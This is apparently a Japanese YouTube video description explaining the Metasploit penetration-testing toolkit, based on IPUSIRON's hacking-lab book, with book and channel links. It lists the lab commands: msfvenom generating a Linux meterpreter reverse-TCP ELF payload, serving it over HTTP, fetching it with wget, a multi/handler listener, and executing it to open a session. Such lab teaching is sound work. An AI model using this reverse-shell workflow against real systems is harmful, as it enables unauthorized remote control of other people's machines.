【遠隔操作の恐怖…】Metasploitとは? まるでハッ〇ーになった気分! 「ハッキング・ラボのつくりかた完全版」でも使われるツール! No.141
今回は「Metasploit」を解説します。
Metasploitはペネトレーションテスト(侵入テスト)や脆弱性診断に使われるオープンソースのツールキットです。
IPUSIONさんの書籍「ハッキング・ラボのつくりかた完全版」でも使用されているツールです。
本動画では、リバースシェルを作り、セッション確立までを行います。
ペネトレーションテストや脆弱性評価のために広く使われているオープンソースツール「Metasploit」の基本について解説します。
Metasploitの歴史、主要な機能、使い方の流れ、そしてリバースシェルを活用した攻撃手法を分かりやすく説明します。
動画制作にあたり、ハッカー書籍ではレジェンド的存在の「IPUSIRON」さんが書かれました、
『ハッキング・ラボのつくりかた 完全版 仮想環境におけるハッカー体験学習』を参考に動画制作しております。
注:動画制作にあたり、IPUSIRONさんご本人の許可を得ております。
<Metasploitの主要コンポーネント>
msfconsole: Metasploitの主要なコマンドラインインターフェース。
モジュール: エクスプロイト、ペイロード、エンコーダー、ノップスなどの説明。
データベース: 脆弱性の管理とスキャン結果の格納に使う部分。
▼重要な注意事項
動画の内容を実施する場合、法的および倫理的な側面に留意し、
合法的なネットワーク許可を得た場合にのみ使用するようにしてください。
セキュリティツールは適切に使用されるべきであり、
不正アクセスや不正行為には使用してはいけません。
セキュリティテストは合法的で倫理的な方法で行うべきです。
【目次】
00:00 オープニング
00:49 Metasploitとは?
01:30 Metasploitの開発者
02:42 Metasploitのバージョン
03:35 Metasploitの機能
05:37 Metasploitの使い方!
06:41 使ってみよう!
07:04 ペイロードを作ってみよう!
09:07 リバースシェルの待ち受け設定
09:38 セッションの確立!
10:48 現実的なペイロード実行の課題
12:31 まとめ
14:13 エンディング
動画で使ったコマンド
info payloads/linux/x86/meterpreter_reverse_tcp
msfvenom –payload linux/x86/meterpreter_reverse_tcp –platform linux –arch x86 LHOST=192.168.179.17 LPORT=4444 –format elf –out ~/Desktop/evil
sudo python3 -m http.server 80
wget http://192.168.179.17:80/evil-
use exploit/multi/handler
set payload linux/x86/meterpreter_reverse_tcp
set LHOST 192.168.179.17
set LPORT 4444
show options
exploit
ls -l evil
chmod +x evil
./evil
★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆
▼書籍の購入はコチラ!
『ハッキング・ラボのつくりかた 完全版 仮想環境におけるハッカー体験学習』は、下記のリンクより購入出来ます。
当チャンネルの視聴者の皆様なら、購入しても損はない書籍と思います。
▼ハッキング・ラボのつくりかた 完全版(2024年2月20日発売の新刊!!)
⇒新刊では、『Parrot OS』でのハッキング環境構築になります。
・Amazon(紙 or Kindle版)
https://www.amazon.co.jp/dp/4798174572/
・翔泳社の公式通販SEshop
こちらは紙 or PDF版が購入出来ます。
初回であれば500円分のポイントと、紙とPDF版をセットで買うと15%分のポイントが貰えます。
https://www.seshop.com/product/detail/26055
★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆
▼IPUSIRONさんのX(Twitter)
https://twitter.com/ipusiron
▼IPUSIRONさんのサイト Security Akademeia【セキュリティアカデメイア】
https://akademeia.info/
★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆
▼Git-Hub
https://github.com/rapid7/metasploit-framework
▼参考サイト
https://ja.wikipedia.org/wiki/Metasploit
https://tech-blog.rakus.co.jp/entry/20231107/reverseshell
★公式ブログ
https://yukuri-it-channel.com/
★当チャンネルのSNSアカウント
不審なアカウントでなければ、基本的にフォローバック致します。
また、プロフィール設定が初期設定 or 鍵垢は、スパム被害防止のため、フォローバックは致しません。
X(Twitter)
https://twitter.com/yukuri_it
Instagram
https://www.instagram.com/yukuri_it_channel/
threads
http://threads.net/@yukuri_it_channel
★お問い合わせ
info@yukuri-it-channel.com
▼クレジット
・使用BGM
冒頭:Morning フリーBGM DOVASYNDROME OFFICIAL YouTube CHANNEL
本編:Good Morning Sunshine フリーBGM DOVASYNDROME OFFICIAL YouTube CHANNEL
終盤:NEFFEX Believe Instrumental
エンディング:春よ強く美しく フリーBGM DOVASYNDROME OFFICIAL YouTube CHANNEL
・使用素材
YouTuberのための素材屋さん
https://ytsozaiyasan.com/
動画制作の背景
久しぶりのハッキングネタです。
IPUSIRONさんの書籍「ハッキング・ラボのつくりかた完全版」を参考にしております。
Metasploitの動画、ずっと作りたかったんですよね。
もし、好評であれば第2弾として別な機能の紹介動画を検討してます。
最近、ハッキングネタを作っていなかったのは、
YouTubeの仕様なのかコメントが非表示になったりとNGワードっぽかったからです。
なので、ハッキング系の動画制作を自重しておりましたね…
このYouTubeの突然の仕様変更がよくわからないので避けてたんですよ。
ただ、IPUSIRONさんが今度、とあるイベントに参加されるので、
その前の週に動画を投稿し、イベントを盛り上げようと思いました!
